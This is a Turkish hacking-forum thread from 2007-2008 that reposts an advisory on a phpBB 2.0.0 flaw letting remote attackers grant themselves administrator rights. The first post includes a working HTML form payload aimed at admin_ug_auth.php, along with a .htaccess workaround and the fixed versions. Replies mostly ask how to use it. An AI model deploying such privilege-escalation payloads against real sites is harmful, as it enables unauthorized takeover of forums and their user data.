Sehitler Ölmez phpBB Yetqisiz Yönetim Açığı Erişimi Açığı
hack, Program, Oyun, Ceptelefonu, Ogame, crack, serial, donanım
Ekim 14, 2008, 03:54:01 ÖÖ *
Program, Oyun, Crack, Serial, Msn Hack, Hacking ve güvenlik portalına hoşgeldiniz.. Lütfen giriş yapın veya üye olun.

Kullanıcı adınızı, parolanızı ve aktif kalma süresini giriniz
Duyurular: Şehitlerimizin Ruhu Şad Olsun !

 


Sayfa: [1]   Aşağı git
Yazdır
Gönderen Konu: phpBB Yetqisiz Yönetim Açığı Erişimi Açığı  (Okunma Sayısı 973 defa)
0 Üye ve 1 Ziyaretçi konuyu incelemekte.
By-DoOmSdaY
Teğmen
*

Rep Puanı : 2
Offline Offline

Mesaj Sayısı: 55

Konu Sayısı: 13
« : Aralık 20, 2007, 12:42:11 ÖS »

phpBB2'de yetkisiz saldırganların yönetim haklarına sahip olmalarına izin veren bir açık keşfedildi.
 
Etkilenen forum'a özel bir post göndererek 'yönetici' (administrator) izinlerini istenilen kullanıcılara vermek mümkün oluyor.

örnek:
<html>
<head>
</head>
<body>

<form method="post"
action="http://www.domain_name/board_directory/admin/admin_ug_auth.php">
User Level: <select name="userlevel">
<option value="admin">Administrator</option>
<option value="user">User</option></select>
<input type="hidden" name="private[1]" value="0">
<input type="hidden" name="moderator[1]" value="0">
<input type="hidden" name="mode" value="user">
<input type="hidden" name="adv" value="">
User Number: <input type="text" name="u" size="5">
<input type="submit" name="submit" value="Submit">

</form>
</body>
</html>

Geçici çözüm:
.htaccess kimlik tanılama kullanılarak /admin dizinine erişim kısıtlanabilir.

Çözüm:
v2.0.0 sürümünden sonrakiler bu açıktan etkilenmiyor.

Güncelleme aşağıdaki adresten yapılabilir:

phpBB Group phpBB 2.0 .0:
phpBB Group Upgrade phpBB 2.0.3
http://www.phpbb.com/downloads.php

kaynak: http://online.securityfocus.com/bid/6056


Açığı gerçekleştirme
Yerel:

Hayır

Uzaktan:

Evet

Etkilenen Sistemler
Etkilenenler:

phpBB Group phpBB 2.0.0

Etkilenmeyenler:

phpBB Group phpBB 2.0.1
phpBB Group phpBB 2.0.2
phpBB Group phpBB 2.0.3




               +rep iStemiyorum .
Moderatöre Bildir   Logged
HeyqıR
Teğmen
*

Rep Puanı : 0
Offline Offline

Mesaj Sayısı: 1

Konu Sayısı: 0
« Yanıtla #1 : Aralık 22, 2007, 08:13:14 ÖS »

neden rap istmiuirsin low
güsel  paylas ım +repp sana benden istemediin için Göz kırpan
Moderatöre Bildir   Logged
fearless_hacker
Yüzbaşı
**

Rep Puanı : 1
Offline Offline

Cinsiyet: Bay
Mesaj Sayısı: 139

Konu Sayısı: 12

bir site hacklayana kadar hacker değilim


WWW
« Yanıtla #2 : Ocak 05, 2008, 11:17:44 ÖÖ »

valla ben bunu anlamadım nasıl yapcaz şimdi bu verdiğin kodları nereye yazcaz nasıl kullancaz hiçanlamadım bna yardım edermisin
Moderatöre Bildir   Logged

YER SİYAH GÖK BEYAZ ŞAMPİYON BEŞİKTAŞ

ERKEK ADAM RENKLİ TAKIM TUTMAAAAAAAZ


FEARLESS HACKER HACKIN KRALI
GeceHekta™
Yarbay
****

Rep Puanı : 272
Offline Offline

Cinsiyet: Bay
Mesaj Sayısı: 836

Konu Sayısı: 156

C:\WİNDOWS\SYSTEM32\GeceHekta™


WWW
« Yanıtla #3 : Ocak 15, 2008, 06:06:06 ÖS »

valla ben bunu anlamadım nasıl yapcaz şimdi bu verdiğin kodları nereye yazcaz nasıl kullancaz hiçanlamadım bna yardım edermisin

albendede  okadar...!
Moderatöre Bildir   Logged

Bırakma beni sevdiğim gidişine dayanamam,
Hasret gözyaşlarımla kendimi avutamam,
Dönerim dersin ama kadere inanamam,
Bıraktığın anılarla sensiz yaşayamam..


http://imageshack.us/
Djinn_#27
Teğmen
*

Rep Puanı : 0
Offline Offline

Mesaj Sayısı: 21

Konu Sayısı: 0
« Yanıtla #4 : Ocak 28, 2008, 04:34:37 ÖS »

sanırım pm atıcaz admine ya da bunlarla konu mu açılcak bilmiorum ki anlamadım:S:S
Moderatöre Bildir   Logged
akarsu_6161
Yüzbaşı
**

Rep Puanı : 3
Offline Offline

Mesaj Sayısı: 109

Konu Sayısı: 17


« Yanıtla #5 : Şubat 12, 2008, 06:30:01 ÖS »

bune ya
Moderatöre Bildir   Logged

http://www.hitresim.com/upload/Barış%20Akarsu%20Anısına-FL7.jpg
sametkubali
Yüzbaşı
**

Rep Puanı : -28
Offline Offline

Cinsiyet: Bay
Mesaj Sayısı: 143

Konu Sayısı: 32


« Yanıtla #6 : Nisan 14, 2008, 06:38:30 ÖS »

iyide nasıl bişey ki
Moderatöre Bildir   Logged

session13
Teğmen
*

Rep Puanı : 0
Offline Offline

Mesaj Sayısı: 18

Konu Sayısı: 1
« Yanıtla #7 : Mayıs 10, 2008, 06:22:31 ÖS »

ben de anlamadım açıkcası:) ama mantıklı gelmedi.
anlamadığım içindir o da
Moderatöre Bildir   Logged
dictator
Yüzbaşı
**

Rep Puanı : 10
Offline Offline

Mesaj Sayısı: 181

Konu Sayısı: 41


« Yanıtla #8 : Mayıs 12, 2008, 02:35:12 ÖS »

Hiç anlamayın en İyisi
Çok ciddiyim
Moderatöre Bildir   Logged

rose_berg
Yarbay
****

Rep Puanı : 25
Offline Offline

Mesaj Sayısı: 562

Konu Sayısı: 108

Farkı Hisset !!!


« Yanıtla #9 : Haziran 21, 2008, 04:05:19 ÖS »

emeğine sağlık :::
Moderatöre Bildir   Logged

dark0eyes
Teğmen
*

Rep Puanı : 0
Offline Offline

Mesaj Sayısı: 3

Konu Sayısı: 1
« Yanıtla #10 : Ekim 02, 2008, 08:00:38 ÖS »

anlayanlar bi anlatsada bizde emege saygı desek
Moderatöre Bildir   Logged
By-DoOmSdaY
Teğmen
*

Rep Puanı : 2
Offline Offline

Mesaj Sayısı: 55

Konu Sayısı: 13
« Yanıtla #11 : Ekim 11, 2008, 01:25:05 ÖS »

uzun süreli aranızda olamadığım için cevap verememistm kusura bakmayınız konuyu yeniden ele alacağım en yakın zamanda Tesekkurler ilginiz için.
Moderatöre Bildir   Logged
Sayfa: [1]   Yukarı git
Yazdır
Gitmek istediğiniz yer:  


Powered by SMF 1.1.6 | SMF © 2006, Simple Machines LLC


Reklam vermek için sabotecom@windowslive.com adresine mail gönderiniz. Sabote.com bir forum sitesidir ve siteye gönderilen tüm mesajlar onaydan geçmeksizin anında paylaşılmaktadır. Sabote yönetimi yazılan mesajlardan sorumlu değildir, tüm sorumluluk mesajı yazan kişilere aittir. Yasalara aykırı bulduğunuz mesajları linkleriyle beraber sabotecom@windowslive.com adresine bildirebilirsiniz. Şikayetiniz en kısa sürede incelemeye alınacaktır.. For English: Please let us know any illegal activity to sabotecom@windowslive.com

2008© sabote.com
Bu Sayfa 0.163 Saniyede 19 Sorgu ile Oluşturuldu
popup Hosgeldiniz close
guest Hala Üye degilmisiniz?
Üye olmak çok kolay
Üye olmak için tiklayin